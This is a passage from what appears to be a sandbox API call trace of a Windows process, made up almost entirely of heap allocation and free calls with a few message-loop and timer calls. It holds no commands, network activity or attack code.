hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0186.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0186.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0186.841] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.841] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0186.841] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0186.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0186.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0186.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0186.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0186.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0186.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0186.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.842] CharLowerBuffW (in: lpsz="byte[80168]", cchLength=0xb | out: lpsz="byte[80168]") returned 0xb [0186.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0186.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0186.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0186.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0186.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0186.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0186.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0186.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0186.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0186.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0186.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0186.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0186.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0186.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0186.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13928) returned 0x3bf3978 [0186.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0186.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0186.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0186.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0186.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0186.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0186.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0186.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0186.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0186.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0186.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0186.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0186.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0186.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0186.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.846] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0186.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0186.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0186.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0186.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0186.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0186.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0186.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0186.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0186.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0186.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0186.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13925) returned 0x3c072a8 [0186.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0186.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13925) returned 0x3c1abd8 [0186.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0186.949] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0186.949] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0186.949] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0186.949] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0186.949] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0186.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0186.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0186.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0186.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0186.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0186.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0186.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0186.950] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0186.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0186.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0186.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0186.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0186.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0186.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0186.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0186.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0186.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0186.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0186.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0186.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0186.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0186.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0186.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0186.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0186.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0186.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13925) returned 0x3c072a8 [0186.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0186.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c072a8 | out: hHeap=0x970000) returned 1 [0186.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0186.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0186.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0186.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0186.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0186.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0186.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0186.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0186.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0186.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.957] HeapFree (in: 